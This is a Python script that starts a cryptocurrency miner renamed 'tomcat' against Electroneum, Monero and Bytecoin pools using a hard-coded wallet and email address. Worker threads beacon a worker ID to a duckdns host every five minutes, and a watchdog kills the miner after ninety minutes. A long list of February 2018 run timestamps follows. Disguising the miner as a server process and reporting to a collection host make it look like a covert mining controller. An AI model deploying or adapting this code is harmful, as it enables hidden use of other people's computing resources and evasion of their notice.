import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:07.276187
#2018-02-17 16:57:01.362583
#2018-02-17 18:44:05.357608
#2018-02-17 20:33:05.763640
#2018-02-17 22:19:04.183722
#2018-02-18 00:03:01.641977
#2018-02-18 01:53:06.231317
#2018-02-18 03:41:05.621949
#2018-02-18 05:29:07.406032
#2018-02-18 07:21:05.211940
#2018-02-18 09:09:05.114092
#2018-02-18 10:55:03.324110
#2018-02-18 12:42:04.148991
#2018-02-18 14:29:01.424177
#2018-02-18 16:19:01.881841
#2018-02-18 18:08:05.066221
#2018-02-18 19:54:04.983503
#2018-02-18 21:41:01.645247
#2018-02-18 23:29:01.443378
#2018-02-19 01:16:05.194504
#2018-02-19 03:03:06.975727
#2018-02-19 04:50:09.536001
#2018-02-19 06:35:04.425763
#2018-02-19 08:23:08.557601
#2018-02-19 10:13:05.890564
#2018-02-19 12:00:10.408331
#2018-02-19 13:48:06.774525
#2018-02-19 15:38:05.275404
#2018-02-19 17:26:07.178673
#2018-02-19 19:14:05.011846
#2018-02-19 21:01:03.473277
#2018-02-19 22:48:03.839882
#2018-02-20 00:31:06.886021
#2018-02-20 02:19:06.157051
#2018-02-20 04:09:05.106080
#2018-02-20 05:52:05.979996
#2018-02-20 07:38:07.710376
#2018-02-20 09:23:05.525451
#2018-02-20 11:07:06.646796
#2018-02-20 12:54:06.406949
#2018-02-20 14:40:04.573419
#2018-02-20 16:24:09.955654
#2018-02-20 18:11:09.023094
#2018-02-20 20:03:09.898170
#2018-02-20 21:49:06.960166
#2018-02-20 23:31:01.838221
#2018-02-21 01:15:04.647263
#2018-02-21 03:02:07.098117
#2018-02-21 04:49:03.644793
#2018-02-21 06:38:05.124595
#2018-02-21 08:24:06.596070
#2018-02-21 10:09:05.742576
#2018-02-21 11:57:03.766394
#2018-02-21 13:46:15.683777
#2018-02-21 15:27:09.548337
#2018-02-21 17:17:08.098337
#2018-02-21 19:06:06.036807
#2018-02-21 20:53:04.531677
#2018-02-21 22:39:05.153178
#2018-02-22 00:28:04.198884
#2018-02-22 02:18:07.771301
#2018-02-22 04:04:08.474580
#2018-02-22 05:50:08.667889
#2018-02-22 07:35:05.608109
#2018-02-22 09:23:07.505759
#2018-02-22 11:09:01.832584
#2018-02-22 12:55:01.358059
#2018-02-22 14:43:13.041863
#2018-02-22 16:29:09.241491
#2018-02-22 18:15:10.227300
#2018-02-22 20:04:04.724690
#2018-02-22 21:52:08.150842
#2018-02-22 23:38:05.845613
#2018-02-23 01:27:07.518317
#2018-02-23 03:13:03.591289
#2018-02-23 05:00:08.425257
#2018-02-23 06:46:02.051686
#2018-02-23 08:34:01.791380
#2018-02-23 10:47:09.657119
#2018-02-23 12:46:05.610174
#2018-02-23 14:29:05.792262
#2018-02-23 16:20:07.295197
#2018-02-23 18:06:05.725021
#2018-02-23 19:50:07.732656
#2018-02-23 21:35:06.224101
#2018-02-23 23:22:05.955752
#2018-02-24 01:14:02.111728
#2018-02-24 03:05:01.328672
#2018-02-24 04:51:05.311237
#2018-02-24 06:36:07.543011
#2018-02-24 08:24:07.180162
#2018-02-24 10:10:04.177563
#2018-02-24 12:05:08.844603
#2018-02-24 13:53:06.161043
#2018-02-24 15:44:03.751604
#2018-02-24 17:38:05.249881
#2018-02-24 19:23:04.818894
#2018-02-24 21:14:03.743955
#2018-02-24 23:49:05.095615
#2018-02-25 03:40:07.213433
#2018-02-25 06:21:06.398680
#2018-02-25 11:40:07.039481